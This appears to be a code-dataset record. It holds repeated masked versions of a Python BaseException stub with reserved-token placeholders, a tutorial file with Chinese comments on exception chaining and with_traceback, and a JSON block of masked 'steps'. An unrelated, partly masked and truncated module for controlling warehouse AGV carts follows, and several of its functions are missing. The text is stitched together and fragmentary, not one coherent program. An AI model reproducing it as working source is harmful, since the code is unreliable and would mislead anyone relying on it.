""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs):
pass
<|reserved_special_token_0|>
def __setattr__(self, *args, **kwargs):
""" Implement setattr(self, name, value). """
pass
def __setstate__(self, *args, **kwargs):
pass
def __str__(self, *args, **kwargs):
""" Return str(self). """
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class BaseException(object):
<|reserved_special_token_0|>
def with_traceback(self, tb):
"""
Exception.with_traceback(tb) --
set self.__traceback__ to tb and return self.
"""
pass
def __delattr__(self, *args, **kwargs):
""" Implement delattr(self, name). """
pass
def __getattribute__(self, *args, **kwargs):
""" Return getattr(self, name). """
pass
def __init__(self, *args, **kwargs):
pass
@staticmethod
def __new__(*args, **kwargs):
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs):
pass
def __repr__(self, *args, **kwargs):
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs):
""" Implement setattr(self, name, value). """
pass
def __setstate__(self, *args, **kwargs):
pass
def __str__(self, *args, **kwargs):
""" Return str(self). """
pass
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class BaseException(object):
<|reserved_special_token_0|>
def with_traceback(self, tb):
"""
Exception.with_traceback(tb) --
set self.__traceback__ to tb and return self.
"""
pass
def __delattr__(self, *args, **kwargs):
""" Implement delattr(self, name). """
pass
def __getattribute__(self, *args, **kwargs):
""" Return getattr(self, name). """
pass
def __init__(self, *args, **kwargs):
pass
@staticmethod
def __new__(*args, **kwargs):
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs):
pass
def __repr__(self, *args, **kwargs):
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs):
""" Implement setattr(self, name, value). """
pass
def __setstate__(self, *args, **kwargs):
pass
def __str__(self, *args, **kwargs):
""" Return str(self). """
pass
args = property(lambda self: object(), lambda self, v: None, lambda
self: None)
__cause__ = property(lambda self: object(), lambda self, v: None, lambda
self: None)
<|reserved_special_token_0|>
__context__ = property(lambda self: object(), lambda self, v: None, lambda
self: None)
<|reserved_special_token_0|>
__suppress_context__ = property(lambda self: object(), lambda self, v:
None, lambda self: None)
__traceback__ = property(lambda self: object(), lambda self, v: None,
lambda self: None)
__dict__ = None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# -*- encoding: utf-8 -*-
class BaseException(object):
""" Common base class for all exceptions """
def with_traceback(self, tb): # real signature unknown; restored from __doc__
"""
Exception.with_traceback(tb) --
set self.__traceback__ to tb and return self.
"""
pass
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __setstate__(self, *args, **kwargs): # real signature unknown
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
args = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__cause__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception cause"""
__context__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception context"""
__suppress_context__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__traceback__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__dict__ = None # (!) real value is "mappingproxy({'__repr__': <slot wrapper '__repr__' of 'BaseException' objects>, '__str__': <slot wrapper '__str__' of 'BaseException' objects>, '__getattribute__': <slot wrapper '__getattribute__' of 'BaseException' objects>, '__setattr__': <slot wrapper '__setattr__' of 'BaseException' objects>, '__delattr__': <slot wrapper '__delattr__' of 'BaseException' objects>, '__init__': <slot wrapper '__init__' of 'BaseException' objects>, '__new__': <built-in method __new__ of type object at 0x00007FFC49400810>, '__reduce__': <method '__reduce__' of 'BaseException' objects>, '__setstate__': <method '__setstate__' of 'BaseException' objects>, 'with_traceback': <method 'with_traceback' of 'BaseException' objects>, '__suppress_context__': <member '__suppress_context__' of 'BaseException' objects>, '__dict__': <attribute '__dict__' of 'BaseException' objects>, 'args': <attribute 'args' of 'BaseException' objects>, '__traceback__': <attribute '__traceback__' of 'BaseException' objects>, '__context__': <attribute '__context__' of 'BaseException' objects>, '__cause__': <attribute '__cause__' of 'BaseException' objects>, '__doc__': 'Common base class for all exceptions'})"
# __context__ :当在except子异常或finally子异常中引发(或重新引发)异常时,(既有多个try)
# __context__ 被自动设置为捕获的最后一个异常;如果没有处理新的异常,最终显示的回溯将包括最初的异常和最终的异常
# try:
# try:
# raise ValueError("ValueError")
# except ValueError as first:
# raise TypeError("TypeError") from first
# except TypeError as second:
# print("The exception was", repr(second))
# print("Its __context__ was", repr(second.__context__))
# print("Its __cause__ was", repr(second.__cause__))
#
# The exception was TypeError('TypeError')
# Its __context__ was ValueError('ValueError')
# Its __cause__ was ValueError('ValueError')
## 必须要有raise from
## context 为raise from 的 excepton
# try:
# try:
# raise AttributeError("1")
# except Exception as e1:
# raise AttributeError from e1
# except AttributeError as exc_1:
# print("context::",repr(exc_1.__context__))
# print("cause::",repr(exc_1.__cause__))
# AttributeError 是raise from e1 即context,cause为 e1
# print("context::",repr(exc_1.__context__))
# print("cause::",repr(exc_1.__cause__))
# try:
# try:
# try:
# raise AttributeError("1")
# except Exception as e1:
# raise AttributeError("2") from e1
# except AttributeError as e2:
# print("context::",repr(e2.__context__))
# print("cause::",repr(e2.__cause__))
# # context:: AttributeError('1')
# # cause:: AttributeError('1')
# raise AttributeError("3") from e2
# except AttributeError as e3:
# print("context::", repr(e3.__context__))
# print("cause::", repr(e3.__cause__))
# context:: AttributeError('2')
# cause:: AttributeError('2')
# with_traceback(tb)
# This method sets tb as the new traceback for the exception and returns the exception object.
# 即设置异常 的trackback
# try:
# raise AttributeError("1")
# except AttributeError as exc:
# import sys
# tb = sys.exc_info()[2]
# raise AttributeError("2")
# Traceback (most recent call last):
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 125, in <module>
# raise AttributeError("1")
# AttributeError: 1
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 129, in <module>
# raise AttributeError("2")
# AttributeError: 2
# try:
# raise AttributeError("1")
# except AttributeError as exc:
# import sys
# tb = sys.exc_info()[2]
# raise AttributeError("2").with_traceback(tb)
# Traceback (most recent call last):
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 125, in <module>
# raise AttributeError("1")
# AttributeError: 1
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 129, in <module>
# raise AttributeError("2").with_traceback(tb)
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 125, in <module>
# raise AttributeError("1")
# AttributeError: 2
try:
try:
raise AttributeError("1")
except AttributeError as exc1:
raise AttributeError("2")
except AttributeError as exc2:
import sys
tb = sys.exc_info()[2]
raise AttributeError("3").with_traceback(tb)
# Traceback (most recent call last):
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 173, in <module>
# raise AttributeError("3").with_traceback(tb)
# File "F:/PYTHON_CODE/python-expections-learn/_base_exception.py", line 169, in <module>
# raise AttributeError("2") from exc1
# AttributeError: 3
|
flexible
|
{
"blob_id": "3d01910ae1c163067f4a23b3cca109a7d9e193d5",
"index": 5251,
"step-1": "class BaseException(object):\n <mask token>\n\n def with_traceback(self, tb):\n \"\"\"\n Exception.with_traceback(tb) --\n set self.__traceback__ to tb and return self.\n \"\"\"\n pass\n\n def __delattr__(self, *args, **kwargs):\n \"\"\" Implement delattr(self, name). \"\"\"\n pass\n\n def __getattribute__(self, *args, **kwargs):\n \"\"\" Return getattr(self, name). \"\"\"\n pass\n\n def __init__(self, *args, **kwargs):\n pass\n\n @staticmethod\n def __new__(*args, **kwargs):\n \"\"\" Create and return a new object. See help(type) for accurate signature. \"\"\"\n pass\n\n def __reduce__(self, *args, **kwargs):\n pass\n <mask token>\n\n def __setattr__(self, *args, **kwargs):\n \"\"\" Implement setattr(self, name, value). \"\"\"\n pass\n <mask token>\n\n def __str__(self, *args, **kwargs):\n \"\"\" Return str(self). \"\"\"\n pass\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class BaseException(object):\n <mask token>\n\n def with_traceback(self, tb):\n \"\"\"\n Exception.with_traceback(tb) --\n set self.__traceback__ to tb and return self.\n \"\"\"\n pass\n\n def __delattr__(self, *args, **kwargs):\n \"\"\" Implement delattr(self, name). \"\"\"\n pass\n\n def __getattribute__(self, *args, **kwargs):\n \"\"\" Return getattr(self, name). \"\"\"\n pass\n\n def __init__(self, *args, **kwargs):\n pass\n\n @staticmethod\n def __new__(*args, **kwargs):\n \"\"\" Create and return a new object. See help(type) for accurate signature. \"\"\"\n pass\n\n def __reduce__(self, *args, **kwargs):\n pass\n <mask token>\n\n def __setattr__(self, *args, **kwargs):\n \"\"\" Implement setattr(self, name, value). \"\"\"\n pass\n\n def __setstate__(self, *args, **kwargs):\n pass\n\n def __str__(self, *args, **kwargs):\n \"\"\" Return str(self). \"\"\"\n pass\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-3": "class BaseException(object):\n <mask token>\n\n def with_traceback(self, tb):\n \"\"\"\n Exception.with_traceback(tb) --\n set self.__traceback__ to tb and return self.\n \"\"\"\n pass\n\n def __delattr__(self, *args, **kwargs):\n \"\"\" Implement delattr(self, name). \"\"\"\n pass\n\n def __getattribute__(self, *args, **kwargs):\n \"\"\" Return getattr(self, name). \"\"\"\n pass\n\n def __init__(self, *args, **kwargs):\n pass\n\n @staticmethod\n def __new__(*args, **kwargs):\n \"\"\" Create and return a new object. See help(type) for accurate signature. \"\"\"\n pass\n\n def __reduce__(self, *args, **kwargs):\n pass\n\n def __repr__(self, *args, **kwargs):\n \"\"\" Return repr(self). \"\"\"\n pass\n\n def __setattr__(self, *args, **kwargs):\n \"\"\" Implement setattr(self, name, value). \"\"\"\n pass\n\n def __setstate__(self, *args, **kwargs):\n pass\n\n def __str__(self, *args, **kwargs):\n \"\"\" Return str(self). \"\"\"\n pass\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-4": "class BaseException(object):\n <mask token>\n\n def with_traceback(self, tb):\n \"\"\"\n Exception.with_traceback(tb) --\n set self.__traceback__ to tb and return self.\n \"\"\"\n pass\n\n def __delattr__(self, *args, **kwargs):\n \"\"\" Implement delattr(self, name). \"\"\"\n pass\n\n def __getattribute__(self, *args, **kwargs):\n \"\"\" Return getattr(self, name). \"\"\"\n pass\n\n def __init__(self, *args, **kwargs):\n pass\n\n @staticmethod\n def __new__(*args, **kwargs):\n \"\"\" Create and return a new object. See help(type) for accurate signature. \"\"\"\n pass\n\n def __reduce__(self, *args, **kwargs):\n pass\n\n def __repr__(self, *args, **kwargs):\n \"\"\" Return repr(self). \"\"\"\n pass\n\n def __setattr__(self, *args, **kwargs):\n \"\"\" Implement setattr(self, name, value). \"\"\"\n pass\n\n def __setstate__(self, *args, **kwargs):\n pass\n\n def __str__(self, *args, **kwargs):\n \"\"\" Return str(self). \"\"\"\n pass\n args = property(lambda self: object(), lambda self, v: None, lambda\n self: None)\n __cause__ = property(lambda self: object(), lambda self, v: None, lambda\n self: None)\n <mask token>\n __context__ = property(lambda self: object(), lambda self, v: None, lambda\n self: None)\n <mask token>\n __suppress_context__ = property(lambda self: object(), lambda self, v:\n None, lambda self: None)\n __traceback__ = property(lambda self: object(), lambda self, v: None, \n lambda self: None)\n __dict__ = None\n\n\n<mask token>\n",
"step-5": "# -*- encoding: utf-8 -*-\n\n\n\nclass BaseException(object):\n \"\"\" Common base class for all exceptions \"\"\"\n def with_traceback(self, tb): # real signature unknown; restored from __doc__\n \"\"\"\n Exception.with_traceback(tb) --\n set self.__traceback__ to tb and return self.\n \"\"\"\n pass\n\n def __delattr__(self, *args, **kwargs): # real signature unknown\n \"\"\" Implement delattr(self, name). \"\"\"\n pass\n\n def __getattribute__(self, *args, **kwargs): # real signature unknown\n \"\"\" Return getattr(self, name). \"\"\"\n pass\n\n def __init__(self, *args, **kwargs): # real signature unknown\n pass\n\n @staticmethod # known case of __new__\n def __new__(*args, **kwargs): # real signature unknown\n \"\"\" Create and return a new object. See help(type) for accurate signature. \"\"\"\n pass\n\n def __reduce__(self, *args, **kwargs): # real signature unknown\n pass\n\n def __repr__(self, *args, **kwargs): # real signature unknown\n \"\"\" Return repr(self). \"\"\"\n pass\n\n def __setattr__(self, *args, **kwargs): # real signature unknown\n \"\"\" Implement setattr(self, name, value). \"\"\"\n pass\n\n def __setstate__(self, *args, **kwargs): # real signature unknown\n pass\n\n def __str__(self, *args, **kwargs): # real signature unknown\n \"\"\" Return str(self). \"\"\"\n pass\n\n args = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n\n __cause__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n \"\"\"exception cause\"\"\"\n\n __context__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n \"\"\"exception context\"\"\"\n\n __suppress_context__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n\n __traceback__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default\n\n\n __dict__ = None # (!) 
real value is \"mappingproxy({'__repr__': <slot wrapper '__repr__' of 'BaseException' objects>, '__str__': <slot wrapper '__str__' of 'BaseException' objects>, '__getattribute__': <slot wrapper '__getattribute__' of 'BaseException' objects>, '__setattr__': <slot wrapper '__setattr__' of 'BaseException' objects>, '__delattr__': <slot wrapper '__delattr__' of 'BaseException' objects>, '__init__': <slot wrapper '__init__' of 'BaseException' objects>, '__new__': <built-in method __new__ of type object at 0x00007FFC49400810>, '__reduce__': <method '__reduce__' of 'BaseException' objects>, '__setstate__': <method '__setstate__' of 'BaseException' objects>, 'with_traceback': <method 'with_traceback' of 'BaseException' objects>, '__suppress_context__': <member '__suppress_context__' of 'BaseException' objects>, '__dict__': <attribute '__dict__' of 'BaseException' objects>, 'args': <attribute 'args' of 'BaseException' objects>, '__traceback__': <attribute '__traceback__' of 'BaseException' objects>, '__context__': <attribute '__context__' of 'BaseException' objects>, '__cause__': <attribute '__cause__' of 'BaseException' objects>, '__doc__': 'Common base class for all exceptions'})\"\n\n\n\n# __context__ :当在except子异常或finally子异常中引发(或重新引发)异常时,(既有多个try)\n# __context__ 被自动设置为捕获的最后一个异常;如果没有处理新的异常,最终显示的回溯将包括最初的异常和最终的异常\n\n\n# try:\n# try:\n# raise ValueError(\"ValueError\")\n# except ValueError as first:\n# raise TypeError(\"TypeError\") from first\n# except TypeError as second:\n# print(\"The exception was\", repr(second))\n# print(\"Its __context__ was\", repr(second.__context__))\n# print(\"Its __cause__ was\", repr(second.__cause__))\n#\n# The exception was TypeError('TypeError')\n# Its __context__ was ValueError('ValueError')\n# Its __cause__ was ValueError('ValueError')\n\n\n## 必须要有raise from\n## context 为raise from 的 excepton\n\n# try:\n# try:\n# raise AttributeError(\"1\")\n# except Exception as e1:\n# raise AttributeError from e1\n# except AttributeError as exc_1:\n# 
print(\"context::\",repr(exc_1.__context__))\n# print(\"cause::\",repr(exc_1.__cause__))\n\n # AttributeError 是raise from e1 即context,cause为 e1\n # print(\"context::\",repr(exc_1.__context__))\n # print(\"cause::\",repr(exc_1.__cause__))\n\n# try:\n# try:\n# try:\n# raise AttributeError(\"1\")\n# except Exception as e1:\n# raise AttributeError(\"2\") from e1\n# except AttributeError as e2:\n# print(\"context::\",repr(e2.__context__))\n# print(\"cause::\",repr(e2.__cause__))\n# # context:: AttributeError('1')\n# # cause:: AttributeError('1')\n# raise AttributeError(\"3\") from e2\n# except AttributeError as e3:\n# print(\"context::\", repr(e3.__context__))\n# print(\"cause::\", repr(e3.__cause__))\n # context:: AttributeError('2')\n # cause:: AttributeError('2')\n\n\n# with_traceback(tb)\n\n# This method sets tb as the new traceback for the exception and returns the exception object.\n# 即设置异常 的trackback\n\n# try:\n# raise AttributeError(\"1\")\n# except AttributeError as exc:\n# import sys\n# tb = sys.exc_info()[2]\n# raise AttributeError(\"2\")\n\n# Traceback (most recent call last):\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 125, in <module>\n# raise AttributeError(\"1\")\n# AttributeError: 1\n#\n# During handling of the above exception, another exception occurred:\n#\n# Traceback (most recent call last):\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 129, in <module>\n# raise AttributeError(\"2\")\n# AttributeError: 2\n\n\n# try:\n# raise AttributeError(\"1\")\n# except AttributeError as exc:\n# import sys\n# tb = sys.exc_info()[2]\n# raise AttributeError(\"2\").with_traceback(tb)\n\n# Traceback (most recent call last):\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 125, in <module>\n# raise AttributeError(\"1\")\n# AttributeError: 1\n#\n# During handling of the above exception, another exception occurred:\n#\n# Traceback (most recent call last):\n# File 
\"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 129, in <module>\n# raise AttributeError(\"2\").with_traceback(tb)\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 125, in <module>\n# raise AttributeError(\"1\")\n# AttributeError: 2\n\ntry:\n try:\n raise AttributeError(\"1\")\n except AttributeError as exc1:\n raise AttributeError(\"2\")\nexcept AttributeError as exc2:\n import sys\n tb = sys.exc_info()[2]\n raise AttributeError(\"3\").with_traceback(tb)\n\n# Traceback (most recent call last):\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 173, in <module>\n# raise AttributeError(\"3\").with_traceback(tb)\n# File \"F:/PYTHON_CODE/python-expections-learn/_base_exception.py\", line 169, in <module>\n# raise AttributeError(\"2\") from exc1\n# AttributeError: 3\n",
"step-ids": [
9,
10,
11,
12,
15
]
}
|
[
9,
10,
11,
12,
15
] |
<|reserved_special_token_0|>
@utility.init()
def init():
if utility.is_test():
return
api.init()
time.sleep(3)
def wait():
global g_threads
for t in g_threads:
t.join()
g_threads.clear()
@utility.fini()
def fini():
if utility.is_test():
return
api.fini()
wait()
<|reserved_special_token_0|>
def getStockA(loc):
if loc[0:6] != 'stockA':
return None
m = re.search('stockA_row(\\d+)_col(\\d+).*', loc)
if m is None:
return None
row = int(m.group(1))
col = int(m.group(2))
if row is None:
return
if row % 2 != 1:
row -= 1
return row * 1000 + col
@lock.lock(g_lock)
def checkTimeout(index, agvId, loc):
global g_stockLock
if index in g_stockLock:
if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:
unlockStockA(agvId, loc)
log.warning('delete timeout locked', index)
def lockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index is None:
return
if index in g_stockLock:
checkTimeout(index, agvId, loc)
log.warning(agvId, loc, 'is locked, wait for unlock')
for i in range(60 * 5):
if index not in g_stockLock:
break
time.sleep(1)
log.info(agvId, loc, 'wait for unlock success')
global g_lock
log.debug(agvId, 'lock', loc, index)
g_lock.acquire()
g_stockLock[index] = utility.ticks()
g_lock.release()
@lock.lock(g_lock)
def unlockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index in g_stockLock:
log.debug(agvId, 'unlock', loc, index)
del g_stockLock[index]
@lock.lock(g_lock)
def getPoint(originPoint):
global g_point
loadPoint()
if g_point[originPoint] is not None:
return g_point[originPoint]
return originPoint
@lock.lock(g_lock)
def getOriginPoint(point):
global g_point
loadPoint()
for itemIndex in g_point:
if g_point[itemIndex] == point:
return itemIndex
return point
@lock.lock(g_lock)
def loadPoint():
global g_point
filePath = os.path.dirname(__file__)
fileName = 'point.cfg'
if filePath:
fileName = filePath + '/' + fileName
g_point = json_codec.load_file(fileName)
@lock.lock(g_lock)
def checkCart(cartId, scanId):
scanId = scanId.strip()
def loadCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
g_carts = json_codec.load_file(pp)
def saveCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
json_codec.dump_file(pp, g_carts)
def findCart(scanId):
global g_carts
for c in g_carts:
if g_carts[c] == scanId:
return c
return 'unknown'
global g_carts
if g_carts is None:
loadCart()
if cartId in g_carts:
if scanId != g_carts[cartId]:
log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))
raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart
(scanId))
else:
g_carts[cartId] = scanId
saveCart()
def _run(func, args, callback, obj):
def threadFunc(func, args, callback, obj):
hasCallback = False
try:
func(*args)
if utility.is_exited():
return
hasCallback = True
callback(obj)
except Exception as e:
obj['result'] = -1
obj['resultDesc'] = str(e)
log.exception('agvCtrl:', e)
if 'agv' in obj:
agvId = obj['agv']
log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')
restAgv(agvId)
freeAgv(agvId)
if not hasCallback:
callback(obj)
t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))
global g_threads
t.start()
g_threads.append(t)
def _initObj(obj, agvId):
obj['agv'] = agvId
obj['result'] = 0
obj['resultDesc'] = 'success'
<|reserved_special_token_0|>
def apply(locId):
locId = getOriginPoint(locId)
return api.apply(locId + '.1')
def call(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
locId = getOriginPoint(locId)
try:
_run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
return agvId
<|reserved_special_token_0|>
def moveCart(agvId, cartId, srcLoc, locId, finishCallback, obj):
_initObj(obj, agvId)
assert api.isCartLoc(cartId)
srcLoc = getOriginPoint(srcLoc)
locId = getOriginPoint(locId)
try:
_run(func=_moveCart, args=(agvId, srcLoc, locId, cartId), callback=
finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
<|reserved_special_token_0|>
def freeAgv(agvId):
try:
api.unlock(agvId)
except Exception as e:
log.exception('freeAgv', e)
def restAgv(agvId):
agvId2 = api.getAgvId(agvId)
api.reset(agvId2)
<|reserved_special_token_0|>
def testgetPoint():
resulta = getPoint('StockA_row7_col4')
assert resulta == 'begin_1'
resultb = getPoint('StockA_row8_col4')
assert resultb == 'begin_2'
def testgetOrginPoint():
resulta = getOriginPoint('begin_1')
assert resulta == 'StockA_row7_col4'
resultb = getOriginPoint('begin_2')
assert resultb == 'StockA_row8_col4'
resultc = getOriginPoint('hhahahaa')
assert resultc == 'hhahahaa'
<|reserved_special_token_0|>
def testcheckCart():
global g_carts
g_carts = None
checkCart('CART9001', '591')
checkCart('CART9002', '592')
gg = json_codec.load_file('cart.cfg')
assert 'CART9001' in gg
assert 'CART9002' in gg
assert gg['CART9001'] == '591'
assert gg['CART9002'] == '592'
checkCart('CART9002', '592')
checkCart('CART9001', '591')
try:
checkCart('CART9002', '591')
assert 0
except Exception as e:
s = str(e)
assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1
<|reserved_special_token_0|>
def func2(stock1, stock2):
print('-------------------- start thread ------------------------',
stock1, stock2)
time.sleep(1)
cartId = 'CART9009'
for i in range(20):
print('current loop is - ', i.__str__())
move_cart(cartId, stock1, stock2)
move_cart(cartId, stock2, stock1)
print('current loop end - ', i.__str__())
print('=======================================')
print('finish func2')
print('=======================================')
def func3(times, starts, seats):
current = starts
cartId = 'CART9009'
time.sleep(1)
for loop in range(0, times - 1):
tip1 = 'currentLoop is ' + loop.__str__(
) + ' currentStart is ' + current
print(tip1)
for i in range(0, len(seats)):
next = str(seats[i])
tip2 = ('currentLoop is ' + loop.__str__() +
'currentOrigin is ' + current + 'currentNext is ' + next +
' seatIndex is ' + i.__str__())
print(tip2)
print('excuting')
move_cart(cartId, current, next)
current = next
def testPageAgvControl(jsonstr):
jsonData = json.loads(jsonstr)
result = False
if len(jsonData) == 0:
result = False
else:
for currentJson in jsonData:
start = currentJson['start']
seat = currentJson['seat']
loop = int(currentJson['loop'])
seats = str.split(seat, ',')
durabilityTestTask1 = threading.Thread(target=func3, args=[loop,
start, seats])
durabilityTestTask1.start()
result = True
return result
<|reserved_special_token_0|>
def testPageUnloockAll():
api.unlockAll()
<|reserved_special_token_0|>
def test1():
Init()
durabilityTestTask1 = threading.Thread(target=func3, args=[20,
'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])
durabilityTestTask1.start()
durabilityTestTask2 = threading.Thread(target=func3, args=[20,
'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])
durabilityTestTask3 = threading.Thread(target=func3, args=[20,
'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])
durabilityTestTask4 = threading.Thread(target=func3, args=[20,
'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])
durabilityTestTask1.join()
print('===============ALL FINISH ========================')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@utility.init()
def init():
if utility.is_test():
return
api.init()
time.sleep(3)
def wait():
global g_threads
for t in g_threads:
t.join()
g_threads.clear()
@utility.fini()
def fini():
if utility.is_test():
return
api.fini()
wait()
<|reserved_special_token_0|>
def getStockA(loc):
if loc[0:6] != 'stockA':
return None
m = re.search('stockA_row(\\d+)_col(\\d+).*', loc)
if m is None:
return None
row = int(m.group(1))
col = int(m.group(2))
if row is None:
return
if row % 2 != 1:
row -= 1
return row * 1000 + col
@lock.lock(g_lock)
def checkTimeout(index, agvId, loc):
global g_stockLock
if index in g_stockLock:
if utility.ticks() - g_stockLock[index] > 10 * 60 * 1000:
unlockStockA(agvId, loc)
log.warning('delete timeout locked', index)
def lockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index is None:
return
if index in g_stockLock:
checkTimeout(index, agvId, loc)
log.warning(agvId, loc, 'is locked, wait for unlock')
for i in range(60 * 5):
if index not in g_stockLock:
break
time.sleep(1)
log.info(agvId, loc, 'wait for unlock success')
global g_lock
log.debug(agvId, 'lock', loc, index)
g_lock.acquire()
g_stockLock[index] = utility.ticks()
g_lock.release()
@lock.lock(g_lock)
def unlockStockA(agvId, loc):
global g_stockLock
index = getStockA(loc)
if index in g_stockLock:
log.debug(agvId, 'unlock', loc, index)
del g_stockLock[index]
@lock.lock(g_lock)
def getPoint(originPoint):
global g_point
loadPoint()
if g_point[originPoint] is not None:
return g_point[originPoint]
return originPoint
@lock.lock(g_lock)
def getOriginPoint(point):
global g_point
loadPoint()
for itemIndex in g_point:
if g_point[itemIndex] == point:
return itemIndex
return point
@lock.lock(g_lock)
def loadPoint():
global g_point
filePath = os.path.dirname(__file__)
fileName = 'point.cfg'
if filePath:
fileName = filePath + '/' + fileName
g_point = json_codec.load_file(fileName)
@lock.lock(g_lock)
def checkCart(cartId, scanId):
scanId = scanId.strip()
def loadCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
g_carts = json_codec.load_file(pp)
def saveCart():
global g_carts
p = os.path.dirname(__file__)
pp = 'cart.cfg'
if p:
pp = p + '/' + pp
json_codec.dump_file(pp, g_carts)
def findCart(scanId):
global g_carts
for c in g_carts:
if g_carts[c] == scanId:
return c
return 'unknown'
global g_carts
if g_carts is None:
loadCart()
if cartId in g_carts:
if scanId != g_carts[cartId]:
log.error('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart(scanId))
raise Exception('货架ID不正确,期望货架:' + cartId + ', 实际货架:' + findCart
(scanId))
else:
g_carts[cartId] = scanId
saveCart()
def _run(func, args, callback, obj):
def threadFunc(func, args, callback, obj):
hasCallback = False
try:
func(*args)
if utility.is_exited():
return
hasCallback = True
callback(obj)
except Exception as e:
obj['result'] = -1
obj['resultDesc'] = str(e)
log.exception('agvCtrl:', e)
if 'agv' in obj:
agvId = obj['agv']
log.debug('小车:' + agvId + ',出现未经处理的异常,正在返航 ')
restAgv(agvId)
freeAgv(agvId)
if not hasCallback:
callback(obj)
t = threading.Thread(target=threadFunc, args=(func, args, callback, obj))
global g_threads
t.start()
g_threads.append(t)
def _initObj(obj, agvId):
obj['agv'] = agvId
obj['result'] = 0
obj['resultDesc'] = 'success'
<|reserved_special_token_0|>
def apply(locId):
locId = getOriginPoint(locId)
return api.apply(locId + '.1')
def call(agvId, locId, finishCallback, obj):
_initObj(obj, agvId)
locId = getOriginPoint(locId)
try:
_run(func=_call, args=(agvId, locId), callback=finishCallback, obj=obj)
except Exception as e:
restAgv(agvId)
freeAgv(agvId)
raise e
return agvId
def _moveCart(agvId, srcLoc, locId, cartId):
try:
c = api.mission(agvId, 2)
if c:
checkCart(cartId, c)
api.move(agvId, srcLoc + '.2')
except Exception as e:
pass
finally:
unlockStockA(agvId, srcLoc)
loc, type = api.getMissionType('get', '', srcLoc)
api.mission(agvId, type)
